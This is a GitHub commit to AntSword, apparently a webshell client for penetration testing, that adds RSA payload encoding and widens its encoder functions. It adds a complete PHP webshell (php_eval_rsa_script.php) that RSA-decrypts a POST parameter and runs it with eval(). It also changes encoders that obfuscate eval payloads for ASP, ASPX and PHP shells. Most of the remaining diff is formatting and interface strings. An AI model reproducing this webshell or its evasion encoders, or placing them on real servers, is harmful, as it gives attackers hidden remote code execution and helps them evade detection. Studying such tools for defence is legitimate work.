更新编码器Encoder，添加扩展参数，添加 RSA 模式，添加 PHP-RSA 示例

AntSwordProject · Apr 17, 2019 · 4985a39 · 4985a39
1 parent 7c6b04d
commit 4985a39
Show file tree

Hide file tree

Showing 17 changed files with 452 additions and 201 deletions.
diff --git a/package.json b/package.json
@@ -9,6 +9,7 @@
     "iconv-lite": "^0.4.23",
     "jschardet": "^1.6.0",
     "nedb": "^1.5.1",
+    "node-rsa": "^1.0.5",
     "superagent": "^3.8.3",
     "superagent-proxy": "^1.0.3",
     "tar": "^4.4.6",

diff --git a/shells/php_eval_rsa_script.php b/shells/php_eval_rsa_script.php
@@ -0,0 +1,32 @@
+<?php 
+/**
+*              _   ____                       _
+*   __ _ _ __ | |_/ ___|_      _____  _ __ __| |
+*  / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
+* | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
+*  \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
+* ———————————————————————————————————————————————
+*     AntSword PHP eval RSA Script
+* 
+*     警告：
+*         此脚本仅供合法的渗透测试以及爱好者参考学习
+*          请勿用于非法用途，否则将追究其相关责任！
+* ———————————————————————————————————————————————
+* pwd=ant
+*/
+$cmd = @$_POST['ant'];
+$publicKey = <<<EOF
+-----BEGIN PUBLIC KEY-----
+Input your Public Key
+-----END PUBLIC KEY-----
+EOF;
+$cmds = explode("|", $cmd);
+$publicKey = openssl_pkey_get_public($publicKey);
+$cmd = '';
+foreach ($cmds as $value) {
+	if (openssl_public_decrypt(base64_decode($value), $de, $publicKey)) {
+		$cmd .= $de;
+	}
+}
+eval($cmd);
+?>
diff --git a/source/core/asp/encoder/xxxxdog.js b/source/core/asp/encoder/xxxxdog.js
@@ -7,7 +7,7 @@
 // 密码：ant
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   data[pwd] = data['_'].replace(/eval/ig, 'xxxx');
   delete data['_'];
   return data;

diff --git a/source/core/aspx/encoder/base64.js b/source/core/aspx/encoder/base64.js
@@ -6,7 +6,7 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   let randomID = `_0x${Math.random().toString(16).substr(2)}`;
   data[randomID] = Buffer.from(data['_']).toString('base64');
   data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`;

diff --git a/source/core/aspx/encoder/hex.js b/source/core/aspx/encoder/hex.js
@@ -6,8 +6,7 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
-
+module.exports = (pwd, data, ext = null) => {
     let randomID = `_0x${Math.random().toString(16).substr(2)}`;
     let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new System.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Convert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Globalization.NumberStyles.HexNumber))));}return sb.ToString();};";
     data[randomID] = Buffer.from(data['_']).toString('hex');

diff --git a/source/core/base.js b/source/core/base.js
@@ -7,6 +7,8 @@
 'use strict';
 
 const iconv = require('iconv-lite');
+const NodeRSA = require('node-rsa');
+const fs = require('fs');
 
 class Base {
 
@@ -52,11 +54,22 @@ class Base {
       }
     }
     // 解析自定义编码器
-    this.user_encoders.map((_)=>{
+    this.user_encoders.map((_) => {
       this.parseEncoder(`${_}`);
     });
   }
 
+  /**
+   * 返回 RSA 对象
+   * @return {Object}
+   */
+  rsaEncrypt() {
+    let key = new NodeRSA();
+    let priKey = fs.readFileSync(path.join(remote.process.env.AS_WORKDIR, `antData/key_rsa`));
+    key.importKey(priKey.toString(), 'private');
+    return key;
+  }
+
   /**
    * 返回参数列表
    * @return {array} [arg1, arg2, arg3..]
@@ -131,7 +144,7 @@ class Base {
     for (let funcName in templateObj) {
       this[templateName][funcName] = (
         (args) => {
-          if (typeof(args) === 'object') {
+          if (typeof (args) === 'object') {
             // 如果脚本函数需要参数，则进行解析
             return (argv) => {
               let data = {};
@@ -152,7 +165,7 @@ class Base {
                       (func = formatter[tagArr[0]])
                     ) {
                       // 如果包含有分割标签且该格式化函数存在，则调用该函数进行处理
-                      retStr = func( argv[tagArr[1] || ''] );
+                      retStr = func(argv[tagArr[1] || '']);
                     } else {
                       // 否则替换直接返回字符串
                       retStr = argv[tagStr] || '';
@@ -185,7 +198,7 @@ class Base {
     // https://github.com/AntSwordProject/antSword/issues/135#issuecomment-475842870
     delete require.cache[require.resolve(`${enc}`)];
     // QAQ！我也不知道为什么，如果直接require变量名，babel编译就会warning，so我只好加个`咯～
-    this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1]:enc.split(`encoder\\`)[1]] = require(`${enc}`);
+    this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1] : enc.split(`encoder\\`)[1]] = require(`${enc}`);
   }
 
   /**
@@ -196,10 +209,14 @@ class Base {
    * @return {Object}       最终生成数据// 将返回三个参数对象：tag_s,tag_e,data
    */
   encodeComplete(tag_s, tag_e, data) {
+    let ext = {
+      rsa: this.rsaEncrypt()
+    }
     // 编码器处理
     let finalData = this.__encoder__[this.__opts__['encoder']](
       this.__opts__['pwd'],
-      data
+      data,
+      ext
     );
     return {
       'tag_s': tag_s,
@@ -225,7 +242,7 @@ class Base {
         // 请求完毕返回数据{text,buff}
         .once(`request-${hash}`, (event, ret) => {
           return res({
-            'encoding': ret['encoding']||"",
+            'encoding': ret['encoding'] || "",
             'text': ret['text'],
             'buff': ret['buff']
           });

diff --git a/source/core/custom/encoder/base64.js b/source/core/custom/encoder/base64.js
@@ -6,7 +6,7 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   let ret = {};
   for (let _ in data) {
     if (_ === '_') { continue };

diff --git a/source/core/custom/encoder/hex.js b/source/core/custom/encoder/hex.js
@@ -4,7 +4,7 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   let ret = {};
   for (let _ in data) {
     if (_ === '_') { continue };

diff --git a/source/core/php/encoder/base64.js b/source/core/php/encoder/base64.js
@@ -5,7 +5,7 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   // 生成一个随机变量名
   let randomID = `_0x${Math.random().toString(16).substr(2)}`;
   data[randomID] = Buffer.from(data['_']).toString('base64');

diff --git a/source/core/php/encoder/chr.js b/source/core/php/encoder/chr.js
@@ -5,14 +5,14 @@
 
 'use strict'
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   // 编码函数
   const encode = (php) => {
     let ret = [];
     let i = 0;
-    while(i < php.length) {
+    while (i < php.length) {
       ret.push(php[i].charCodeAt());
-      i ++;
+      i++;
     }
     return `@eVAl(cHr(${ret.join(').ChR(')}));`;
   }

diff --git a/source/core/php/encoder/chr16.js b/source/core/php/encoder/chr16.js
@@ -5,14 +5,14 @@
 
 'use strict'
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   // 编码函数
   const encode = (php) => {
     let ret = [];
     let i = 0;
-    while(i < php.length) {
+    while (i < php.length) {
       ret.push(php[i].charCodeAt().toString(16));
-      i ++;
+      i++;
     }
     return `@eVAl(cHr(0x${ret.join(').ChR(0x')}));`;
   }

diff --git a/source/core/php/encoder/rot13.js b/source/core/php/encoder/rot13.js
@@ -6,15 +6,15 @@
 
 'use strict';
 
-module.exports = (pwd, data) => {
+module.exports = (pwd, data, ext = null) => {
   const encode = (s) => {
     //use a Regular Expression to Replace only the characters that are a-z or A-Z
     return s.replace(/[a-zA-Z]/g, function (c) {
-        //Get the character code of the current character and add 13 to it
-        //If it is larger than z's character code then subtract 26 to support wrap around.
-        return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
+      //Get the character code of the current character and add 13 to it
+      //If it is larger than z's character code then subtract 26 to support wrap around.
+      return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
     });
-}
+  }
 
   // 生成一个随机变量名
   let randomID = `_0x${Math.random().toString(16).substr(2)}`;

diff --git a/source/language/en.js b/source/language/en.js
@@ -235,7 +235,7 @@ Hot Keys:
     title: 'FileManager',
     delete: {
       title: 'Delete',
-      confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' files' : num} ?`),
+      confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' files' : num} ?`),
       success: (path) => `Delete file [${path}] success!`,
       error: (path, err) => `Delete file [${path}] failed!${err ? '\n' + err : ''}`
     },
@@ -522,7 +522,7 @@ Hot Keys:
         gridheader: "Name,Type,Length,Not Null,Key,Auto Increment",
         delete_not_select: "Please select the row you want to delete first",
         save_row_is_null: "The number of rows is empty",
-        cell_valid_error: (i,j)=>`Data format validation failed(row ${i+1}, col ${j+1})`,
+        cell_valid_error: (i, j) => `Data format validation failed(row ${i + 1}, col ${j + 1})`,
         confirmtitle: "New table name",
         invalid_tablename: "Table names should not contain special symbols",
         success: 'Create table successfully',
@@ -535,7 +535,7 @@ Hot Keys:
         error: 'Failed to update table',
       },
       deltable: {
-        title:'Delete Table',
+        title: 'Delete Table',
         confirm: (name) => antSword.noxss(`Are you sure you want to delete table ${name}?`),
         success: 'Delete table successfully',
         error: 'Failed to delete table',
@@ -551,7 +551,7 @@ Hot Keys:
         error: 'Failed to update column',
       },
       delcolumn: {
-        title:'Delete Column',
+        title: 'Delete Column',
         confirm: (name) => antSword.noxss(`Are you sure you want to delete column ${name}?`),
         success: 'Delete column successfully',
         error: 'Failed to delete column',
@@ -615,30 +615,38 @@ Hot Keys:
         }
       },
       message: {
-        githint: (workdir)=>`The current source is Git management, please close the program and go to ${workdir} to manually update`,
+        githint: (workdir) => `The current source is Git management, please close the program and go to ${workdir} to manually update`,
         prepare: "Connecte to server...",
-        dling: (progress)=> `Downloading...${progress}%`,
-        dlingnp: (size)=> `Downloading...${size}`,
+        dling: (progress) => `Downloading...${progress}%`,
+        dlingnp: (size) => `Downloading...${size}`,
         dlend: "Download completed",
         extract: "Unpacking, don't close AntSword",
         ing: 'Downloading..',
         fail: (err) => `Update failed! [${err}]`,
         success: 'Update success! Please manually restart the application later!'
       }
     },
-    encoders:{
+    encoders: {
       title: 'Encoder Manager',
       toolbar: {
         new: "New",
         edit: "Edit",
         delete: "Delete",
         help: "Help",
         save: "Save",
+        rsa: "RSA Config",
+        generate: "Generate"
       },
       grid: {
         ename: "Name",
         etype: "Type"
       },
+      form: {
+        public_key: "Public Key",
+        private_key: "Private Key",
+        php_code: "PHP Code"
+      },
+      rsa_config_win_title: "RSA Encoder Config",
       edit_win_title: "Edit Encoder",
       delete_title: "Delete Encoder",
       message: {
@@ -654,12 +662,15 @@ Hot Keys:
         delete_not_select: "Please select the row you want to delete first",
         delete_success: "Delete success",
         ename_invalid: "Name can only contain numbers, letters, and underlines",
+        rsa_save_success: "Generate and save RSA success",
+        rsa_save_error: "Generate and save RSA error",
       },
       prompt: {
         create_encoder: "Create Encoder",
       },
       confirm: {
-        delete: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' encoders' : num}?`),
+        generate: 'Are you sure to regemerate RSA?',
+        delete: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' encoders' : num}?`),
       }
     },
     aproxy: {
@@ -670,7 +681,7 @@ Hot Keys:
       },
       form: {
         label: 'Configure proxy for access to the Internet',
-        mode:{
+        mode: {
           noproxy: 'Do not use agent',
           manualproxy: 'Manually set the proxy'
         },
@@ -689,7 +700,7 @@ Hot Keys:
         content: 'Restart the application to take effect, whether to restart?',
         title: 'Change proxy settings'
       },
-      prompt:{
+      prompt: {
         title: 'Enter the Test-URL',
         success: 'Connect to proxy server successfully',
         error: 'Failed to connect to the proxy server'
@@ -706,7 +717,7 @@ Hot Keys:
       toolbar: {
         save: 'Save'
       },
-      form:{
+      form: {
         shellmanager: {
           title: 'Shell Lists',
           hiddencolumns: {
@@ -759,7 +770,7 @@ Hot Keys:
           },
           del: {
             title: 'Delete Bookmark',
-            confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' Bookmarks' : num+" "}？`),
+            confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' Bookmarks' : num + " "}？`),
             success: 'Delete success'
           },
           edit: {
@@ -781,7 +792,7 @@ Hot Keys:
   },
   viewsite: {
     toolbar: {
-      useproxy: (s) => `Proxy: ${s?'ON':'OFF'}`,
+      useproxy: (s) => `Proxy: ${s ? 'ON' : 'OFF'}`,
       save: 'Save',
       view: 'View'
     },